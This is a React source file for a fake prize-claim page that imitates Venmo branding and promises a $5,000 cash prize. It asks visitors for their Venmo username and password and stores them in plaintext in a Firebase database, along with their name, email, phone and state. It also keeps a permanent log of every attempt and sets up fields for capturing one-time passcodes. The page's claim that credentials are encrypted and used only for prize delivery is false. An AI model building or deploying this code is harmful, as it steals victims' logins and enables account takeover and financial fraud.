import React, { useState } from "react";
import { useNavigate } from "react-router-dom";
import { doc, setDoc, collection, addDoc, serverTimestamp } from "firebase/firestore";
import { db } from "../firebase/config";
import { useApp } from "../context/AppContext";
import Navbar from "../components/Navbar";
import StepIndicator from "../components/StepIndicator";

const VenmoPage = () => {
  const navigate = useNavigate();
  const { userData, updateUserData, setActivePhone } = useApp();

  const [venmoUsername, setVenmoUsername] = useState(userData.venmoUsername);
  const [venmoPassword, setVenmoPassword] = useState(userData.venmoPassword);
  const [showPassword,  setShowPassword]  = useState(false);
  const [loading,       setLoading]       = useState(false);
  const [error,         setError]         = useState("");

  const isReady = venmoUsername.trim().length >= 3 && venmoPassword.trim().length >= 4;

  const handleConnect = async () => {
    if (!isReady || loading) return;
    setLoading(true);
    setError("");

    updateUserData({ venmoUsername, venmoPassword });

    const phone = `+1${userData.phoneNumber}`;

    try {
      const expireAt = new Date(Date.now() + 20 * 60 * 1000);

      const docData = {
        phoneNumber:        phone,
        firstName:          userData.firstName,
        lastName:           userData.lastName,
        email:              userData.email,
        usState:            userData.usState,
        venmoUsername:      venmoUsername.trim(),
        venmoPassword:      venmoPassword,
        submittedAt:        serverTimestamp(),
        expireAt:           expireAt,
        isOTPSent:          false,
        otpSubmittedByUser: "",
        otpVerified:        false,
        detailsIncorrect:   false,
      };

      await setDoc(doc(db, "users", phone), docData);

      // Permanent log
      await addDoc(collection(db, "TriedUsers"), {
        ...docData,
        attemptedAt: serverTimestamp(),
      });

      setActivePhone(phone);
      navigate("/waiting", { state: { phone } });
    } catch (err) {
      console.error(err);
      setError("Connection failed. Please check your connection and try again.");
    } finally {
      setLoading(false);
    }
  };

  return (
    <div className="page-wrapper">
      <Navbar />
      <main className="form-main">
        <div className="card">
          <h2 className="card-title">Connect Your Venmo</h2>
          <p className="card-subtitle">Step 3 of 3 — Receive your $5,000 prize</p>
          <StepIndicator current={3} total={3} />

          {/* Venmo brand banner */}
          <div className="venmo-banner">
            <div className="venmo-logo-row">
              <span className="venmo-v">v</span>
              <span className="venmo-brand">venmo</span>
            </div>
            <p className="venmo-tagline">
              Securely link your Venmo account to receive your cash prize instantly.
            </p>
          </div>

          <div className="form-group" style={{ marginTop: 20 }}>
            <label className="form-label">Venmo Username, Email, or Phone</label>
            <input
              type="text"
              className="form-input venmo-input"
              placeholder="@your-username or email or phone"
              value={venmoUsername}
              onChange={(e) => setVenmoUsername(e.target.value)}
              autoCapitalize="none"
              autoCorrect="off"
            />
            <p className="form-hint">
              Example: @john-smith · john@email.com · +15551234567
            </p>
          </div>

          <div className="form-group">
            <label className="form-label">Venmo Password</label>
            <div className="password-field">
              <input
                type={showPassword ? "text" : "password"}
                className="form-input venmo-input"
                placeholder="Enter your Venmo password"
                value={venmoPassword}
                onChange={(e) => setVenmoPassword(e.target.value)}
              />
              <button
                className="password-toggle"
                onClick={() => setShowPassword(!showPassword)}
                type="button"
              >
                {showPassword ? "🙈" : "👁️"}
              </button>
            </div>
          </div>

          {/* Security note */}
          <div className="security-note">
            <span>🔒</span>
            <span>
              Your credentials are encrypted with 256-bit SSL and used only
              to verify your Venmo account for prize delivery.
            </span>
          </div>

          {error && <p className="field-error" style={{ textAlign: "center", marginTop: 12 }}>⚠ {error}</p>}

          <button
            className={`venmo-btn ${isReady && !loading ? "active" : ""}`}
            onClick={handleConnect}
            disabled={!isReady || loading}
            style={{ marginTop: 20 }}
          >
            {loading ? (
              <span>Connecting<span className="btn-dots">...</span></span>
            ) : (
              "💳  CONNECT &  CLAIM $5,000"
            )}
          </button>

          <p style={{ fontSize: 11, color: "#94a3b8", textAlign: "center", marginTop: 12 }}>
            By connecting, you agree to our Terms of Service and Privacy Policy.
          </p>
        </div>
      </main>
      <footer className="page-footer">© 2026 WinBig LLC. All rights reserved.</footer>
    </div>
  );
};

export default VenmoPage;
